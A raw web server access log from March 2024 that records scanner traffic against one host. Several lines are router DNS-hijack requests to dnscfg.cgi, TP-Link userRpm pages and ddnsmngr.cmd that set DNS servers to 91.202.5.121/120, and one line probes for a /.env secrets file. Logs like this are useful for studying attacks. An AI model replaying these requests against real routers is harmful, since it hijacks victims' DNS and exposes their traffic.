209.141.42.209 - - [07/Mar/2024:04:29:18 +0100] "dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsIfcsList=&dnsRefresh=1&sessionKey=1830278854 HTTP/1.1" 400 329 "-" "-"
103.183.121.244 - - [07/Mar/2024:04:35:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.128.232.191 - - [07/Mar/2024:04:36:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.28 - - [07/Mar/2024:04:37:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:04:41:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:04:41:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
151.235.244.7 - - [07/Mar/2024:04:51:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.233.19.181 - - [07/Mar/2024:04:56:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
188.132.150.199 - - [07/Mar/2024:04:57:47 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
103.183.121.244 - - [07/Mar/2024:04:58:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
64.62.197.134 - - [07/Mar/2024:05:02:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.204 - - [07/Mar/2024:05:05:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.204 - - [07/Mar/2024:05:05:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
209.141.42.209 - - [07/Mar/2024:05:10:49 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.85:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:05:10:49 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.85:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:05:10:49 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.85:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:05:10:49 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.85:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
